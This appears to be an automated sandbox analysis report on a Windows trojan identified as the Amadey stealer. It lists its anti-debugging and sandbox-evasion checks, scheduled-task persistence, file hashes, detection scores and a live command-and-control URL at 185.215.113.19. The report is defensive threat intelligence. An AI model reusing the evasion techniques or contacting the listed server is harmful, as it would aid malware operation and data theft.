Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: explorti.exe, explorti.exe, 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: explorti.exe, 00000006.00000002.3254546503.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: LbMTyCFRzs.exe, 00000000.00000002.2071498341.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2097879981.00000000007FA000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000006.00000002.3254546503.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%.

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Code function: 0_2_054000BF Start: 0540011C End: 05400116

0_2_054000BF

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Code function: 0_2_05400DB3 rdtsc

0_2_05400DB3

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0064645B mov eax, dword ptr fs:[00000030h]		6_2_0064645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0064A1C2 mov eax, dword ptr fs:[00000030h]		6_2_0064A1C2

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe, explorti.exe, 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: :Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0062D312 cpuid

6_2_0062D312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0062CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_0062CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.LbMTyCFRzs.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.explorti.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2645029293.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2031237182.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2071426754.0000000000A11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057567755.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2097820890.0000000000611000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LbMTyCFRzs.exe	52%	Virustotal		Browse
LbMTyCFRzs.exe	100%	Avira	TR/Crypt.TPM.Gen
LbMTyCFRzs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	52%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://185.215.113.19/Vi9leo/index.phpheCounterMutexw	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpC:	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpm32	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php/	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php9	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpz	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	2%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpon	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php=	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpA	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpz	15%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.php#	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.phpsoft	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php%	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpA	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpm32	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.php5eb8a7	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php=	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpj	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php#	2%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpi	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpsoft	17%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpj	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpi	3%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php/	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpC:	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpheCounterMutexw	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpm32	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpz	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php9	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpon	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php=	explorti.exe, 00000006.00000002.3254546503.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpA	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php#	explorti.exe, 00000006.00000002.3254546503.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.phpsoft	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php%	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php5eb8a7	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpj	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpi	explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482970
Start date and time:	2024-07-26 12:55:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LbMTyCFRzs.exe renamed because original name is a hash value
Original Sample Name:	7e7dd12e929d3d547cc88c21baecddc5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/3@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target LbMTyCFRzs.exe, PID 5884 because it is empty
Execution Graph export aborted for target explorti.exe, PID 7288 because there are no executed function
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:57:01	API Interceptor	7250x Sleep call for process: explorti.exe modified
12:56:00	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	DHBIT8FeuO.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	DHBIT8FeuO.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16
	PE1dBCFKZv.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	random.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.67
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.67
	LisectAVT_2403002A_22.exe	Get hash	malicious	Amadey	Browse	185.215.113.32
	LisectAVT_2403002A_338.exe	Get hash	malicious	Amadey	Browse	185.215.113.32

Process:	C:\Users\user\Desktop\LbMTyCFRzs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1894912
Entropy (8bit):	7.949503743043708
Encrypted:	false
SSDEEP:	24576:e5NoFdVHL6WWmTc24Gs6MhjjVnSHL8789ss7uCAhw4IE/QLLiXFU6jSi8GJF2ppS:bdduVL24JliL87g7uCAaE/zS6V8GDU
MD5:	7E7DD12E929D3D547CC88C21BAECDDC5
SHA1:	E93C3B3FDF2125D59978EDD75A85FE3D5397FA0D
SHA-256:	A3AC7A955DC3F036F392BDCB98B2929420A60F40799E3B21C6D435BD2775873B
SHA-512:	37B8CF6CEA4115437E1382902822CB8245DFE033BE506CC4667A7E9303C5491F719F8627F62AA30BED8895CC41EF167D089D3284B5A92CA489F59087DC48889A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 52%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f............................. K...........@..........................PK...........@.................................W...k...........................d.J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...asfmuayv.....01.....................@...wcsgqvbi......K.....................@....taggant.0... K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\LbMTyCFRzs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\LbMTyCFRzs.exe
File Type:	data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	3.442879043157647
Encrypted:	false
SSDEEP:	6:DfAlPXUG5ZsUEZ+lX1cI1l6lm6tFXqYEp5t/uy0l1Xot0:DAtYQ1cagxfXV14t0
MD5:	DB63C257292F5D9F5744CC5758EE8592
SHA1:	E9337CFDFC3388C0F140FDB165A981B6C6ACD9B9
SHA-256:	68627808767C20EBEA163258D9CFECA0AEB998C859873F0116E12C6981E0F8FB
SHA-512:	B235C9D5E7CACC4C447945B5DAAE883008816D06956A6DE43215E07D54228153761655557B16C77C43BB9552A7A5C66251271844223902BD0337D44C8B7C5698
Malicious:	false
Reputation:	low
Preview:	..........B..h$E.8hF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................9.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949503743043708
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LbMTyCFRzs.exe
File size:	1'894'912 bytes
MD5:	7e7dd12e929d3d547cc88c21baecddc5
SHA1:	e93c3b3fdf2125d59978edd75a85fe3d5397fa0d
SHA256:	a3ac7a955dc3f036f392bdcb98b2929420a60f40799e3b21c6d435bd2775873b
SHA512:	37b8cf6cea4115437e1382902822cb8245dfe033be506cc4667a7e9303c5491f719f8627f62aa30bed8895cc41ef167d089d3284b5a92ca489f59087dc48889a
SSDEEP:	24576:e5NoFdVHL6WWmTc24Gs6MhjjVnSHL8789ss7uCAhw4IE/QLLiXFU6jSi8GJF2ppS:bdduVL24JliL87g7uCAaE/zS6V8GDU
TLSH:	B195335B1EE34C13C81D73B529F0C366F3B0EF9C86B58EB0AF041D2DA44665E9A51D2A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF4D4F894CAh
bswap eax
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FF4D4F8B4C5h
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4aff64	0x10	asfmuayv
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4aff14	0x18	asfmuayv
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	ee1365c711786ff667eb27dc2c35fe6d	False	0.9999092810792349	data	7.9863818416966215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	b9550b6f3ea353eff087e3a30b48c599	False	0.576171875	data	4.472346691545891	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a8000	0x200	9eb6fe81362cfc447bbae90bff566e3f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
asfmuayv	0x313000	0x19e000	0x19d200	3bbfadfacc9968d80d8106432119569c	False	0.9944697900907715	data	7.953126827384316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
